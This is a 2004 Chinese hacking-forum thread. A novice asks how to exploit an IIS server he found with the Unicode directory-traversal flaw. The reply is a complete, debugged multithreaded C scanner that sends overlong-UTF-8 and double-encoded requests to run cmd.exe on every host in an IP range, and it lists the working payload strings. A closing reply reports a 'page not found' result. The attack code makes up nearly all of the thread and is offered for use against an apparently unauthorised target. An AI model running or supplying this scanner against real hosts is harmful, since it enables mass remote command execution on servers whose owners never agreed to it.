作者: staiyin [staiyin] 论坛用户 | 登录 |
刚开始学习，找到了一台有 IIS 编码/解码（Unicode 目录穿越）漏洞的机器，却不知道如何下手，还望大虾指点。 |
地主 发表时间: 04-10-09 01:59 |
回复: yourfather [yourfather] 论坛用户 | 登录 |
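/*
 * uniscan -- scans an IPv4 range for IIS servers that answer the
 * "Unicode" directory-traversal request
 *     GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
 * (and its sibling encodings) with 200 OK.
 *
 * Usage:   uniscan [minip] [maxip] [port]
 * Example: uniscan 10.0.0.168 10.0.0.168 80
 *   -> Host 10.0.0.168 -> 80 Unicode:GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
 *   -> Scan End! Find HostCount:1
 *
 * Run it only against hosts you are authorised to test: each probe is a
 * command execution attempt on the target.
 *
 * NOTE(review): the listing as posted had a "possible runtime problem in
 * the child thread" (the author's words). What was wrong and is fixed here:
 *  - Every "[i]" was evidently stripped by the forum's BBCode (it is the
 *    italic tag), so the octet parser compared the whole array
 *    (minip != '\0') and the payload loop passed the whole table to
 *    strcpy(); the indexing is restored.
 *  - One stack `infor` struct was handed to every thread by pointer while
 *    the main loop kept overwriting it, so threads raced on the target IP.
 *    Each thread now gets its own malloc()ed copy and frees it.
 *  - All five HTTP/1.0 requests went over ONE connection. A server normally
 *    closes after an HTTP/1.0 response, so payloads 2..5 were never tested.
 *    Each payload now uses a fresh connection.
 *  - `while(ret=recv(...))` never left the loop on SOCKET_ERROR (-1): it
 *    wrote recvbuf[-1] and spun; `recvbuf[ret]='\0'` overflowed by one when
 *    ret == sizeof(recvbuf); `strcat(recvstr, recvbuf)` appended an
 *    unbounded reply into a 1024-byte stack buffer -- a hostile *target*
 *    could crash or exploit the scanner. Reads are now bounded.
 *  - send() pushed the whole 1024-byte buffer (uninitialised stack bytes
 *    included) rather than the request string.
 *  - On connect() failure the thread returned without threadcount--, so
 *    after MaxThread unreachable hosts the main loop waited forever.
 *    threadcount/findcount were also updated unsynchronised; both are now
 *    Interlocked, and "Scan End" waits for the pool to drain.
 *  - strcpy(minip, argv[1]) into char[20] and min_ip[4][4] overflowed on
 *    long or malformed arguments; addresses and the port are now validated.
 *  - checkerror() tested for -1, which WSAStartup() never returns (it
 *    returns the error code), and exit()ed the whole process from inside a
 *    thread; the CreateThread failure path waited on a NULL handle and
 *    thread handles were never closed.
 *
 * Still true, by design: "200 OK" is only an indication. A site whose custom
 * error page answers 200 (the "page not found" reply reported later in the
 * thread) shows up as a hit; the body is therefore also checked for a
 * "<DIR>" entry, which a real cmd.exe `dir` listing contains and an error
 * page will not.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")

DWORD WINAPI scan(LPVOID lp);

#define ScanSpeed 100       /* ms between thread launches and between pool polls */
#define MaxThread 20        /* upper bound on concurrently running scan threads */
#define RESP_KEEP 4096      /* bytes of a reply we keep: status line + start of body */
#define RECV_TIMEOUT_MS 10000

void usage(char *file)
{
    printf("\n\n----------------------------------------");
    printf("\n Code By JsuFcz -- xxxxxx.net");
    printf("\n USAGE:%s [minip] [maxip] [port]", file);
    printf("\n----------------------------------------\n\n");
}

typedef struct {
    char ip[20];    /* dotted-quad target, NUL-terminated */
    int port;
} infor;

/* Shared between main and the scan threads; only ever touched through
 * Interlocked* so the counters cannot lose updates. */
volatile LONG threadcount;
volatile LONG findcount;

/*
 * Request lines tried against each host, byte-for-byte as posted, now
 * NULL-terminated so scan() does not hard-code the count.
 * %c1%1c, %c0%2f, %c0%af, %c1%09 are overlong UTF-8 encodings of '/' and
 * '\'; %255c is the double-encoded form (a second decode pass turns %25
 * into '%', then %5c into '\').
 */
static const char *const unicode[] = {
    "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "GET /scripts/..%c1%09../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    NULL
};

/*
 * Parses "a.b.c.d" into four octets, each 0..255.
 * Returns 0 on success, -1 for any other shape (too few or too many
 * fields, non-digits, out-of-range values).
 */
static int parse_ip(const char *s, int oct[4])
{
    int i;

    for (i = 0; i < 4; i++) {
        char *end;
        long v;

        if (*s < '0' || *s > '9')
            return -1;
        v = strtol(s, &end, 10);
        if (v < 0 || v > 255)
            return -1;
        if (i < 3) {
            if (*end != '.')
                return -1;
            s = end + 1;
        } else if (*end != '\0') {
            return -1;
        }
        oct[i] = (int)v;
    }
    return 0;
}

/*
 * Sends one request over a fresh connection and stores up to resplen-1
 * bytes of the reply, NUL-terminated, in resp.
 * Returns the number of bytes kept (may be 0), or -1 if the socket could
 * not be created, connected, or written.
 */
static int fetch(const char *ip, int port, const char *request,
                 char *resp, size_t resplen)
{
    struct sockaddr_in sin;
    SOCKET sock;
    char line[512];
    int ntime = RECV_TIMEOUT_MS;
    int n, got, kept = 0;

    resp[0] = '\0';

    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock == INVALID_SOCKET)
        return -1;

    /* Bounds the wait for a reply. connect() on a blocking socket still has
     * no timeout of its own, so a filtered port can hold a thread for the
     * stack's default connect timeout. */
    setsockopt(sock, SOL_SOCKET, SO_RCVTIMEO, (const char *)&ntime, sizeof ntime);

    memset(&sin, 0, sizeof sin);
    sin.sin_family = AF_INET;
    sin.sin_addr.s_addr = inet_addr(ip);
    sin.sin_port = htons((u_short)port);

    if (connect(sock, (struct sockaddr *)&sin, sizeof sin) == SOCKET_ERROR) {
        closesocket(sock);
        return -1;
    }

    /* Request line plus the empty line that ends the header block, CRLF
     * terminated; only the bytes of the string are sent. */
    n = snprintf(line, sizeof line, "%s\r\n\r\n", request);
    if (n < 0 || (size_t)n >= sizeof line || send(sock, line, n, 0) != n) {
        closesocket(sock);
        return -1;
    }

    /* Read until the peer closes, recv() fails or times out, or the keep
     * buffer is full. A result <= 0 ends the loop and is never used as an
     * index. */
    while (kept < (int)resplen - 1) {
        got = recv(sock, resp + kept, (int)resplen - 1 - kept, 0);
        if (got <= 0)
            break;
        kept += got;
    }
    resp[kept] = '\0';

    closesocket(sock);
    return kept;
}

/*
 * True if the reply starts with an "HTTP/1.x 200 " status line.
 * Only the status line is examined; a strstr() over the whole reply (as
 * posted) would also match the text "HTTP/1.1 200 OK" inside an error page.
 */
static int is_200(const char *resp)
{
    return strncmp(resp, "HTTP/1.", 7) == 0 && strncmp(resp + 8, " 200 ", 5) == 0;
}

int main(int argc, char *argv[])
{
    WSADATA wsa;
    int lo[4], hi[4];
    int a, b, c, d;
    int port, ret;
    char *end;

    if (argc != 4) {
        usage(argv[0]);
        exit(-1);
    }

    if (parse_ip(argv[1], lo) != 0 || parse_ip(argv[2], hi) != 0) {
        printf("\nbad ip range: %s %s", argv[1], argv[2]);
        exit(-1);
    }
    port = (int)strtol(argv[3], &end, 10);
    if (*argv[3] == '\0' || *end != '\0' || port < 1 || port > 65535) {
        printf("\nbad port: %s", argv[3]);
        exit(-1);
    }

    /* WSAStartup() reports failure through its return value, not -1/GetLastError. */
    ret = WSAStartup(0x0202, &wsa);
    if (ret != 0) {
        printf("\nWSAStartup() error:%d", ret);
        exit(-1);
    }

    threadcount = 0;
    findcount = 0;

    /* Same enumeration as the posted loops: each octet independently walks
     * from its min to its max, i.e. the "box" spanned by the two addresses,
     * not the linear range between them. */
    for (a = lo[0]; a <= hi[0]; a++) {
        for (b = lo[1]; b <= hi[1]; b++) {
            for (c = lo[2]; c <= hi[2]; c++) {
                for (d = lo[3]; d <= hi[3]; d++) {
                    infor *job;
                    HANDLE h;

                    /* Each thread owns its own copy of the target. */
                    job = malloc(sizeof *job);
                    if (job == NULL) {
                        printf("\nout of memory");
                        goto done;
                    }
                    snprintf(job->ip, sizeof job->ip, "%d.%d.%d.%d", a, b, c, d);
                    job->port = port;

                    /* Pool full: wait one ScanSpeed period and re-check. */
                    while (threadcount >= MaxThread)
                        Sleep(ScanSpeed);

                    /* Counted here rather than inside the thread, so the
                     * pool limit cannot be overshot while threads start up. */
                    InterlockedIncrement(&threadcount);
                    h = CreateThread(NULL, 0, scan, job, 0, NULL);
                    if (h == NULL) {
                        printf("\nCreateThread error!");
                        InterlockedDecrement(&threadcount);
                        free(job);
                    } else {
                        /* Never joined; completion is tracked by threadcount. */
                        CloseHandle(h);
                    }
                    Sleep(ScanSpeed);
                }
            }
        }
    }

done:
    /* Let outstanding threads finish, otherwise the count printed below is
     * whatever it happened to be when the last thread was launched. */
    while (threadcount > 0)
        Sleep(ScanSpeed);

    printf("\n\nScan End! Find HostCount:%ld", (long)findcount);
    WSACleanup();
    return 0;
}

/*
 * Thread body: tries every payload in `unicode` against one host.
 * lp is a malloc()ed `infor` owned by this thread and freed here.
 * Results go to stdout and findcount; the host is counted once even if
 * several payloads succeed. Always returns 0.
 */
DWORD WINAPI scan(LPVOID lp)
{
    infor *lpinfor = (infor *)lp;
    char resp[RESP_KEEP];
    BOOL flag = FALSE;
    int i;

    for (i = 0; unicode[i] != NULL; i++) {
        /* One connection per payload; see the header note on HTTP/1.0. */
        if (fetch(lpinfor->ip, lpinfor->port, unicode[i], resp, sizeof resp) < 0)
            break;  /* refused or unreachable: no point trying the other encodings */

        if (is_200(resp)) {
            if (flag == FALSE) {
                flag = TRUE;
                InterlockedIncrement(&findcount);
            }
            printf("\nHost %s -> %d Unicode:%s", lpinfor->ip, lpinfor->port, unicode[i]);
            /* A 200 with no "<DIR>" entry is most likely a custom error page,
             * not cmd.exe output; flag it rather than silently trusting it. */
            if (strstr(resp, "<DIR>") == NULL)
                printf(" (200 but no directory listing in body - verify by hand)");
        }
    }

    free(lpinfor);
    InterlockedDecrement(&threadcount);
    printf(" END");
    return 0;
}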
B1层 发表时间: 04-10-09 02:11 |
回复: staiyin [staiyin] 论坛用户 | 登录 |
可是我输入如上地址后，显示的页面是“页面不存在”，是不是被过滤了？ |
B2层 发表时间: 04-10-09 13:04 |